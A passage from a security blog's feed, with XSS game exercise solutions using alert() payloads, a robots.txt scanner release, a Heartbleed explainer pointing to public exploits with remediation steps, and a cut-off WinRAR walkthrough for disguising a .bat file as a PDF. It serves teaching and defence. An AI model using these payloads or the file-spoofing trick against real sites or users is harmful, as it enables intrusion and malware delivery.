<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw6nWYiFHcDOonIuDVBMH1K7L0blrY7jWNtr_NIC_KOWx168QeIPh7nXkj3bePjJVK7eK1Z53U4NrebOJ_eSU6DU9y5znivaNo9A89W5sbBc564rVe7TlN6BIBjCo-QQ6VW2hFgALoq3Q/s1600/XSS_1_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw6nWYiFHcDOonIuDVBMH1K7L0blrY7jWNtr_NIC_KOWx168QeIPh7nXkj3bePjJVK7eK1Z53U4NrebOJ_eSU6DU9y5znivaNo9A89W5sbBc564rVe7TlN6BIBjCo-QQ6VW2hFgALoq3Q/s1600/XSS_1_2.png" height="342" width="640" /></a></div>
<br />
<h2 style="text-align: justify;">
Exercise 2</h2>
<div style="text-align: justify;">
This exercise is an example of how to perform a persistent or stored Cross-Site Scripting attack in a simple way.</div>
<br />
<span style="font-family: "Courier New",Courier,monospace;"><img src=x onerror=alert('BehindTheFirewalls')></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM3dWoT-hlC3R1Rjweh6Az3dRc6kHEY9DSdFbkdctz6JjT31FQZ-3NfMtaklpCZ7o5v25ITQII99M-SqNCOhPishd-xkS-8sOZ20BGiB_NN2Vq_PfJ9JbWgAy6acHG0r4MJMFxP4IkuZA/s1600/XSS2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM3dWoT-hlC3R1Rjweh6Az3dRc6kHEY9DSdFbkdctz6JjT31FQZ-3NfMtaklpCZ7o5v25ITQII99M-SqNCOhPishd-xkS-8sOZ20BGiB_NN2Vq_PfJ9JbWgAy6acHG0r4MJMFxP4IkuZA/s1600/XSS2.png" height="342" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtqkDIcBcVJoBIZoVFzjgskkJNHJQGH_FTzRFX1eapCL2ae07ZjZGvkcfksXrs9Lj9PcBlcmiRookNOySJIdwN0HZxq2meoC3fPxTJZn3DTRZ6UCEl1Ctam-YUrWLEliMBzjRTJRNS62o/s1600/XSS2_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtqkDIcBcVJoBIZoVFzjgskkJNHJQGH_FTzRFX1eapCL2ae07ZjZGvkcfksXrs9Lj9PcBlcmiRookNOySJIdwN0HZxq2meoC3fPxTJZn3DTRZ6UCEl1Ctam-YUrWLEliMBzjRTJRNS62o/s1600/XSS2_1.png" height="342" width="640" /></a></div>
<h2 style="text-align: justify;">
Exercise3</h2>
<div style="text-align: justify;">
This exercise is a little complex because the user doesn't have an input to try to exploit the XSS. </div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB0s2PX-w97BPUX7DnqsKqiVtAmstDv1Mef5PraGVXFY7zZy1HmD9ztPGh7p0XqRGc4Qx0RCvCowfmqhgCNtfGTsrg5R6plxuGHIAAxCu4h_LnjBFpKyYEuk1bOHdo8iI5_QPPxJamCbU/s1600/XSS3_0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB0s2PX-w97BPUX7DnqsKqiVtAmstDv1Mef5PraGVXFY7zZy1HmD9ztPGh7p0XqRGc4Qx0RCvCowfmqhgCNtfGTsrg5R6plxuGHIAAxCu4h_LnjBFpKyYEuk1bOHdo8iI5_QPPxJamCbU/s1600/XSS3_0.png" height="362" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
But what happen if we rewrite the URI? If we change "#1" by "#11111"...</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjROsNGeU5thAWD8iXWJn-ivlwYsORd8lu4XI_faUEujdPB7zDK6GMWJaOg7kZwpmtE8xoI4sK1BqiTsT5ktHjBVVVqEfWSlde8LUVsOORixVxZuF0YtRLGMJncFN5EgiQH2VZutVLw9f0/s1600/XSS3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjROsNGeU5thAWD8iXWJn-ivlwYsORd8lu4XI_faUEujdPB7zDK6GMWJaOg7kZwpmtE8xoI4sK1BqiTsT5ktHjBVVVqEfWSlde8LUVsOORixVxZuF0YtRLGMJncFN5EgiQH2VZutVLw9f0/s1600/XSS3.png" height="368" width="640" /></a> ... we will see that "1111" has been added to the source code.
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5m3CQsBw1lUvoPfBQOIRTeshr57fkQ2jxfumBZueKgmdX1Ky0_1F3F6LITzfM2jTTYMol7qCMYO3x3dbwnkL4EKVMeeyA6kQ5LB7PQwhX905i3Ukq9Kzv345erXjh_Qq7C5cukr37XTw/s1600/XSS3_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5m3CQsBw1lUvoPfBQOIRTeshr57fkQ2jxfumBZueKgmdX1Ky0_1F3F6LITzfM2jTTYMol7qCMYO3x3dbwnkL4EKVMeeyA6kQ5LB7PQwhX905i3Ukq9Kzv345erXjh_Qq7C5cukr37XTw/s1600/XSS3_1.png" height="88" width="640" /></a></div>
<br />
So, if we add <span style="font-family: "Courier New",Courier,monospace;">#11111'onerror=alert('BehindTheFirewalls')> </span><span style="font-family: inherit;">at the end of the URL,</span> the code will be:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;"><img src='/static/level3/cloud#11111'onerror=alert('BehindTheFirewalls')>'.jpg' /></span><br />
<br />
<span style="font-family: inherit;">And the alert will appear.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2iW0IX9aFzMFreCuKjxC3syYLZAl7z1yckvib-nMQETz3V_SnUg2do9ciRlaMbqpecubnii8ju8EmUOomP3mrFRMvJJRoEgF6x7N4KpHAkYyP2lOjB5KGegNR9F0Oy988TFkdzNV4Zaw/s1600/XSS_3_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2iW0IX9aFzMFreCuKjxC3syYLZAl7z1yckvib-nMQETz3V_SnUg2do9ciRlaMbqpecubnii8ju8EmUOomP3mrFRMvJJRoEgF6x7N4KpHAkYyP2lOjB5KGegNR9F0Oy988TFkdzNV4Zaw/s1600/XSS_3_2.png" height="322" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
These are the three posible options to exploit this vulnerability.<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">/frame#1'onerror=alert('BehindTheFirewalls')></span><br />
<span style="font-family: "Courier New",Courier,monospace;"><br /></span>
<span style="font-family: "Courier New",Courier,monospace;">/frame#1.jpg'onload=alert('BehindTheFirewalls')></span><br />
<span style="font-family: "Courier New",Courier,monospace;"><br /></span>
<span style="font-family: "Courier New",Courier,monospace;">/frame#1jpg'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT></span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com2tag:blogger.com,1999:blog-3160485247929481680.post-2891217645119681912014-05-27T08:20:00.001-07:002014-05-28T00:13:54.493-07:00Parsero 0.75 is out!!!!<div style="text-align: justify;">
At the beginning of this month, <a href="http://www.toolswatch.org/2014/05/new-tool-parsero-v0-71-attacking-robots-txt-files-released/" target="_blank">Parsero v0.71 was presented by </a><a href="http://www.toolswatch.org/2014/05/new-tool-parsero-v0-71-attacking-robots-txt-files-released/" target="_blank">ToolsWatch Hacker Arsenal</a> in their blog. That is something that I really appreciate...</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Today, I would like to introduce Parsero v0.75. Before writing about that, let me make a brief summary.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div style="text-align: justify;">
As has been written in <a href="https://www.owasp.org/index.php/Testing:_Review_Webserver_Metafiles_for_Information_Leakage_%28OTG-INFO-003%29" target="_blank">OWASP Testing Guide v4: Testing: Review Webserver Metafiles for Information Leakage (OTG-INFO-003)</a>, robots.txt file could be used "for information leakage of the web application's directory or folder path(s)".</div>
<div style="text-align: justify;">
<br /></div>
In order to get sensitive information thanks this file, I've developed Parsero which is able to perform this task automatically.<br />
<h2>
What is new?</h2>
Some problems have been fixed in the current version which have three new features that I would like to talk about.<br />
<br />
<ul>
<li>In the last version, Parsero was able to detect if the content in the Disallow entries had been indexed by Bing by doing searches in this crawler. Now, we are able to check if these links indexed are actually available or not. Notice that Parsero only checks the links of the first Bing results page. It means the first 10 results are analyzed.</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2MzQCcQ5CialJghgniK-LG87B260Ewn2PpMgQ3OG75YyuMvQSOrRElm-pDkCBp0iwfwn1BqZs2HYgLp7NuNO4RBTuNR29v2hEje86U8JAyRmZO8lppVQd5pv0d-JvDTxKePzlsLztbfk/s1600/Robots_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2MzQCcQ5CialJghgniK-LG87B260Ewn2PpMgQ3OG75YyuMvQSOrRElm-pDkCBp0iwfwn1BqZs2HYgLp7NuNO4RBTuNR29v2hEje86U8JAyRmZO8lppVQd5pv0d-JvDTxKePzlsLztbfk/s1600/Robots_4.png" height="321" width="400" /></a> </div>
<br />
<ul>
<li>Now Parsero is able to detect if there are Disallows entries repeated in the robots.txt file in order to check each one once to save time. The picture bellow shows you a robots.txt file with the same links repeated.</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA5zGNmedeUU6bJURsef9Y_CqQxDRW3OtGyyNCL-b-N0kh_8r3JoktOn3GlcdUvcBMe-lH2qTaGj7SE9TL_suKrIHOlvn7G5xvdIuw2fkKLKq2J8IBJPNHfNtxElWlHqODzoMscIWz3pE/s1600/Robots_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA5zGNmedeUU6bJURsef9Y_CqQxDRW3OtGyyNCL-b-N0kh_8r3JoktOn3GlcdUvcBMe-lH2qTaGj7SE9TL_suKrIHOlvn7G5xvdIuw2fkKLKq2J8IBJPNHfNtxElWlHqODzoMscIWz3pE/s1600/Robots_1.png" /></a></div>
<br />
And how Parsero is able to detect it and check each Dissallow entrie only once.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQvFwIaxLPgv2vAF0a2xRJk4JTQ3NGMpj6B_N3RnRgM4QlH4Dajkjxbo7mC26qznCMMPO9qevdcmKJ04ENVrGL3F5F1DURiIWF-4W1Ofy1IxnAVggfK-aYvZMBZdAfbuBt76l0FQVI1P8/s1600/Robots_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQvFwIaxLPgv2vAF0a2xRJk4JTQ3NGMpj6B_N3RnRgM4QlH4Dajkjxbo7mC26qznCMMPO9qevdcmKJ04ENVrGL3F5F1DURiIWF-4W1Ofy1IxnAVggfK-aYvZMBZdAfbuBt76l0FQVI1P8/s1600/Robots_2.png" height="260" width="400" /></a></div>
<br />
<ul>
<li>In the last version, Parsero downloaded the robots.txt to the machine in order to parse it. Now, Parsero performs this task by doing the same task on the fly.</li>
</ul>
<br />
You can download Parsero here: <a href="https://github.com/behindthefirewalls/Parsero" target="_blank">https://github.com/behindthefirewalls/Parsero</a><br />
<br />
More info here: <a href="http://www.behindthefirewalls.com/search/label/Parsero" target="_blank">http://www.behindthefirewalls.com/search/label/Parsero</a><br />
<br /></div>
Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com0tag:blogger.com,1999:blog-3160485247929481680.post-30539095262961815302014-04-15T09:11:00.001-07:002014-04-15T09:11:35.648-07:00OpenSSL Heartbleed, what the hell has happened here?<div style="text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK16HTgCPckBtO9REblPwdKpeGY_iRwjeSuJznDro7xCIcByHFrn63pCjHvkf6tyJln6x28V6kA1yQnbSgNjRlSeT1ZSrRflmZS0m5o8fQkOBHs9NmbSshCp4xc8oEZPVT_BrfLSgx584/s1600/heartbleed.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK16HTgCPckBtO9REblPwdKpeGY_iRwjeSuJznDro7xCIcByHFrn63pCjHvkf6tyJln6x28V6kA1yQnbSgNjRlSeT1ZSrRflmZS0m5o8fQkOBHs9NmbSshCp4xc8oEZPVT_BrfLSgx584/s1600/heartbleed.png" height="200" width="165" /></a><span class="short_text" id="result_box" lang="en" tabindex="-1">Just one day before of <a href="http://www.behindthefirewalls.com/2014/04/microsoft-xp-has-died-but-millions-of.html" target="_blank">Windows XP </a></span><span class="short_text" id="result_box" lang="en" tabindex="-1"><a href="http://www.behindthefirewalls.com/2014/04/microsoft-xp-has-died-but-millions-of.html" target="_blank"><span class="short_text" id="result_box" lang="en" tabindex="-1">end of life</span></a>, the vulnerability with<span class="hps"> <a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160" target="_blank">CVE-2014-0160</a> was published. A lot of blogs have talked about the OpenSSL vulnerability called "<u>Heartbleed Bug</u>". A lot of security administrators have spent our last days focused on patching this security issue... I believe everything has been already said...</span></span><br />
<br />
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">In this post, I'd like to write a brief summary about what has happened with that really interesting and critical topic.</span></span><span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"> </span></span></div>
<div style="text-align: justify;">
<h3>
The BUG description</h3>
These were some of the sentences written by OpenSSL about the <a href="https://www.openssl.org/news/secadv_20140407.txt" target="_blank">BUG</a> in their web site.<br />
<br />
"A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64k of memory to a connected client or server."<br />
<br />
"Affected users should upgrade to OpenSSL 1.0.1g. Users unable to immediately<br />
<div style="text-align: left;">
upgrade can alternatively recompile OpenSSL with -DOPENSSL_NO_HEARTBEATS."<br />
<br />
So... Someone could steal information from our servers/clients thanks this bug... </div>
<br />
<u>But... what is the heartbeat?</u><br />
<br />
That is what the <a href="https://tools.ietf.org/html/rfc6520" target="_blank">RFC 6520</a> says about the heartbeat:<br />
<br />
"DTLS is designed to secure traffic running on top of unreliable transport protocols. Usually, such protocols have no session management. The only mechanism available at the DTLS layer to figure out if a peer is still alive is a costly renegotiation, particularly when the application uses unidirectional traffic. Furthermore, DTLS needs to perform path MTU (PMTU) discovery but has no specific message type to realize it without affecting the transfer of user messages.<br />
<br />
"TLS is based on reliable protocols, but there is not necessarily a feature available to keep the connection alive without continuous data transfer."<br />
<br />
"The Heartbeat Extension as described in this document overcomes these limitations. The user can use the new HeartbeatRequest message, which has to be answered by the peer with a HeartbeartResponse immediately. To perform PMTU discovery, HeartbeatRequest messages containing padding can be used as probe packets, as described in [<a href="https://tools.ietf.org/html/rfc4821" target="_blank">RFC4821</a>]."<br />
<br />
So to avoid renegotiating the secure session continuously (which has a direct impact in the the server performance), Heartbeat was designed to say... "Hey!! Are you still there?? This session is not finished yet!!!"<br />
<br />
<u>How the vulnerability works?</u><br />
<br />
As mentioned above, the security problem resides in the heartbeat. There are hundreds of explanations about this security problem... I've found the <a href="http://imgs.xkcd.com/comics/heartbleed_explanation.png" target="_blank">picture</a> bellow which describes really well how to take advantage of this vulnerability. <span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">It couldn't be explained better.</span></span><br />
<br />
<div style="text-align: center;">
<span style="color: red;">Click on the picture</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxIV1X1IkLq4hHh20M78-yKqac4T2XI7E5dM2SWNTVwDQxbbDaEqpXf2JuliA61reovQcJgKUwgY7tmy9gMH65WS99OHug_4U-9-eU5MvoZpe93dmJSmGmJrVFgUeNqvRKTNrF_oSEbOw/s1600/heartbleed_explanation.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxIV1X1IkLq4hHh20M78-yKqac4T2XI7E5dM2SWNTVwDQxbbDaEqpXf2JuliA61reovQcJgKUwgY7tmy9gMH65WS99OHug_4U-9-eU5MvoZpe93dmJSmGmJrVFgUeNqvRKTNrF_oSEbOw/s1600/heartbleed_explanation.png" height="640" width="300" /></a></div>
<h3>
POC in the server side</h3>
So, are we really able to get 64kb from the memory of a remote server in an easy way? The answer is... YES!!!<br />
<br />
Just download the exploit from <a href="http://www.exploit-db.com/exploits/32764/" target="_blank">here</a> and execute it against a vulnerable server and you will see the 64kb from the memory of the server. Sometimes we will get nothing interesting...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6uLgf37Km8NMyG4FXzCUmh8zKhBcDKNcLqbbMecSbG09mehyphenhyphenaeQVvpZYEAt4SawI6UtdGbbhn-Wb6hJFl3OdKcISdgdIZV7MdBnab2XkUuHjmFs-U0F9OzBRIali3HczL70K_HYqVJO8/s1600/dump1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6uLgf37Km8NMyG4FXzCUmh8zKhBcDKNcLqbbMecSbG09mehyphenhyphenaeQVvpZYEAt4SawI6UtdGbbhn-Wb6hJFl3OdKcISdgdIZV7MdBnab2XkUuHjmFs-U0F9OzBRIali3HczL70K_HYqVJO8/s1600/dump1.png" height="120" width="400" /></a></div>
<br />
... sometimes we will get the usernames and passwords in clear text like you will see in the picture bellow. This image came from a guy who detected that login.yahoo.com was vulnerable to this bug.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWpITqmC52MypDlWSPYhfPeitSsT-q-SGGTa5juc1DhIg0a4tfrczM1hk7sHa-SWs6KYTYcoUvwNTMA7i1gMLfB94J_bcPUZ6JuU_8HxpsqYbVA_tfzDTv4zshynyM3A8Ky9k5mPNkt4k/s1600/Yahoo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWpITqmC52MypDlWSPYhfPeitSsT-q-SGGTa5juc1DhIg0a4tfrczM1hk7sHa-SWs6KYTYcoUvwNTMA7i1gMLfB94J_bcPUZ6JuU_8HxpsqYbVA_tfzDTv4zshynyM3A8Ky9k5mPNkt4k/s1600/Yahoo.png" height="323" width="640" /></a></div>
<br />
I've been testing my vulnerable servers executing the exploit in a loop each second and I was able to get a lot of usernames and password and really interesting information from these vulnerable servers.<br />
<br />
Did you think about 64KB of memory RAM weren't enough to steal valuable information?<br />
<h3>
POC in the client side</h3>
So, are we really able to get 64kb from the memory of a remote client in an easy way? The answer is... YES!!!<br />
<br />
<a href="https://github.com/Lekensteyn/pacemaker" target="_blank">Pacemaker</a> is a script written in Python to attempts to abuse OpenSSL clients that are vulnerable to Heartbleed (CVE-2014-0160). When pacemaker.py is executed, it starts to listen in 4433/TCP port by the default. To try to test if a client is vulnerable, just make a connection to this port. If it is vulnerable, you will see a memory dump of 64kb from your client like in the picture bellow.<br />
<br />
Example: wget -O /dev/null https://google.com https://localhost:4433<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg16RihhQohdJ7_U5hVMloP6XOY4TRZMVxhMCsb3gQoKK_ZycQ3MHzPExgc25bwf0HiiQY6vecdph4YwjWuvI6AGPMca-SI-Q7n1a0fnOG9d5BDO6fYvwtdwLlD863Vg94mtXo2kNOubwk/s1600/Server1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg16RihhQohdJ7_U5hVMloP6XOY4TRZMVxhMCsb3gQoKK_ZycQ3MHzPExgc25bwf0HiiQY6vecdph4YwjWuvI6AGPMca-SI-Q7n1a0fnOG9d5BDO6fYvwtdwLlD863Vg94mtXo2kNOubwk/s1600/Server1.png" height="204" width="400" /></a></div>
<br />
If the client is not vulnerable, the tool will print something like you can see in this image.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-8k1LigiTemTLoRzdIFPzHUTY8HoW1QI1ZRn0_4WXQDhXveiLY-1wL2Le5FT7f04Yj-FxzJMBYf2MkOA9TjXCgLPugZt3EAQhepSA3e7PMetLW7BqpeTRxZxGCMzVnqT4qdUJnQoGcEs/s1600/Server2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-8k1LigiTemTLoRzdIFPzHUTY8HoW1QI1ZRn0_4WXQDhXveiLY-1wL2Le5FT7f04Yj-FxzJMBYf2MkOA9TjXCgLPugZt3EAQhepSA3e7PMetLW7BqpeTRxZxGCMzVnqT4qdUJnQoGcEs/s1600/Server2.png" height="120" width="400" /></a></div>
<h3>
Affected versions</h3>
<u>Servers</u><br />
<br />
Any server using OpenSSL 1.0.1 through 1.0.1f (inclusive) is vulnerable.<br />
<br />
These versions are not vulnerable.<br />
<ul>
<li>OpenSSL 1.0.1g</li>
<li>OpenSSL 1.0.0 branch</li>
<li>OpenSSL 0.9.8 branh </li>
</ul>
<br />
<div style="text-align: left;">
Be aware with appliances which have OpenSSL installed like VPN-SSL devices, Firewalls, etc... They could be vulnerable too. <a href="http://www.kb.cert.org/vuls/byvendor?searchview&Query=FIELD+Reference=720951&SearchOrder=4" target="_blank">Here</a> you can get more info about some of them.</div>
<br />
<u>Clients</u><br />
<br />
The list bellow will show you some vulnerable clients tested by Pacemaker. <br />
<ul>
<li>MariaDB 5.5.36</li>
<li>wget 1.15 (leaks memory of earlier connections and own state)</li>
<li>curl 7.36.0 (https, FTP/IMAP/POP3/SMTP with --ftp-ssl)</li>
<li>git 1.9.1 (tested clone / push, leaks not much)</li>
<li>nginx 1.4.7 (in proxy mode, leaks memory of previous requests)</li>
<li>links 2.8 (leaks contents of previous visits!)</li>
<li>KDE 4.12.4 (kioclient, Dolphin, tested https and ftps with kde4-ftps-kio)</li>
<li>Exim 4.82 (outgoing SMTP)</li>
</ul>
<h3>
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">What</span> should I do<span class="hps">?</span></span></h3>
<ol>
<li>Detect all your vulnerable servers.</li>
<li>Upgrade your OpenSSL to 1.0.1g version.</li>
<li>Your private keys could have been stolen. Acquire new key certificates, revoke your old ones and install the new ones.</li>
<li>The password of your users could have been stolen. Force them to change them.</li>
<li>Inform your customers if you have been vulnerable.</li>
<li>Beware of the inevitable phishing campaigns.</li>
<li>Deploy signatures in your IDS/IPS to detect how many times you are been attacked.</li>
<li>Detect if you have been compromised.</li>
</ol>
</div>
<h3>
The OpenSSL Bug timeline</h3>
<u>04/07/2014 17:30 UTC</u> It was published the security issue by OpenSSL <a href="https://www.openssl.org/news/secadv_20140407.txt" target="_blank">here</a>.<br />
<br />
<div style="text-align: justify;">
<u>04/07/2014 18:00 UTC</u> The website "<a href="http://heartbleed.com/" target="_blank">Heartbleed.com</a>" was published.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>04/07/2014 19:00 UTC</u> OpenSSL released a <a href="http://www.openssl.org/source/" target="_blank">new version "openssl-1.0.1g"</a>.<br />
<br />
<u>04/08/2014</u> <a class="jive-link-external-small" href="https://twitter.com/FiloSottile">Filippo Valsorda</a> published an open source <a class="jive-link-external-small" href="http://filippo.io/Heartbleed/">Heartbleed test</a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>04/09/2014</u> The exploit "<a href="http://www.exploit-db.com/exploits/32764/" target="_blank">OpenSSL TLS Heartbeat Extension - Memory Disclosure - Multiple SSL/TLS versions</a>" was published.<br />
<br />
<u>04/09/2014</u> The module for <a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb" target="_blank">Metasploit</a> appeared.<br />
<br />
<u>04/09/2014</u> A script for <a href="https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse" target="_blank">Nmap</a> was released.<br />
<br />
<u>04/09/2014</u> A stable version of <a href="https://github.com/Lekensteyn/pacemaker" target="_blank">Pacemaker</a> was published.<br />
<br />
<u>04/10/2014</u> The website <a href="http://reverseheartbleed.com/" target="_blank">reverseheartbleed.com</a> was created.</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<br />
<br />
<br /></div>
Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com0tag:blogger.com,1999:blog-3160485247929481680.post-14750676062010767482014-04-14T00:15:00.000-07:002014-04-14T00:15:27.683-07:00Why you shouldn't open files directly from a ZIP file<div style="text-align: justify;">
A few days ago I read this post: <a href="http://an7isec.blogspot.com.es/2014/03/winrar-file-extension-spoofing-0day.html" target="_blank">WinRar File extension spoofing ( 0DAY )</a>. Here, the author describes for example, how to create a ZIP file with a file inside it which has a JPG extension but when it is opened directly from WinRar, an EXE file is executed.<br />
<br />
This vulnerability effects Winrar v4.20 and others could be affected.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In this post, we will create a ".bat" file which will execute a ping command against a Google server (you should think about doing evil actions...), it will be compressed in a ZIP format and using the Hex Editor, we will change the extension to a ".pdf" within the compressed file. When the user opens it, a ".bat" file will be executed instead of opening the "fake" PDF.</div>
<br />
These are the steps to follow.<br />
<br />
<ul style="text-align: justify;">
<li>Create the ".bat" file. You are able to use ".vbs", ".exe" or whatever... A hacker would use their own malware... In our proof of concept I've used a ".bat" file with the name "Best Security Tools 2014.bat".</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikzkn8bIhza72BMQ24QEs4v-_3hj75LWTsBq0j-iFL2LjxgGPn2SD4DY1KaO-RVoaG4Oiaaqdt1DiJhk7fQPHmrdSO2Njnd49ALfEX_EdfpE2j60etoVEKZCD3GIjMIuCVBcvAcuaTkno/s1600/0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikzkn8bIhza72BMQ24QEs4v-_3hj75LWTsBq0j-iFL2LjxgGPn2SD4DY1KaO-RVoaG4Oiaaqdt1DiJhk7fQPHmrdSO2Njnd49ALfEX_EdfpE2j60etoVEKZCD3GIjMIuCVBcvAcuaTkno/s1600/0.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1LGcFftQobGCrDDWP0volSMwbPPdYCUlyChAW4TR93HTWf43L0WXQyezIbKpZ5hHXlmvFGlYzo8TF1IQS6OlgSJQefpy9E9ymmMTvR7IOx_bzltAO-2nkMrnqmZAMeYG4xunRi6nK4Hs/s1600/0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<ul>
<li>Compress the file in a ZIP file using WinRar.</li>
</ul>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEosTjQfgUvxlxN5m-9ne7KA8TzJrHy8rOCbJDi_KiZW5P5dkqS5KjkiQW2QhVlvdvISzLORZxr9gBQi7LqzlkkHg8qdPIapfuasuJgmC3iwn1fGPED4dk_-3s0jt-CQBBB4Yw5MZVC9A/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEosTjQfgUvxlxN5m-9ne7KA8TzJrHy8rOCbJDi_KiZW5P5dkqS5KjkiQW2QhVlvdvISzLORZxr9gBQi7LqzlkkHg8qdPIapfuasuJgmC3iwn1fGPED4dk_-3s0jt-CQBBB4Yw5MZVC9A/s1600/2.png" /></a></div>
<br />
<ul>
<li>We can see our file with the extension".bat" inside the ZIP file.</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
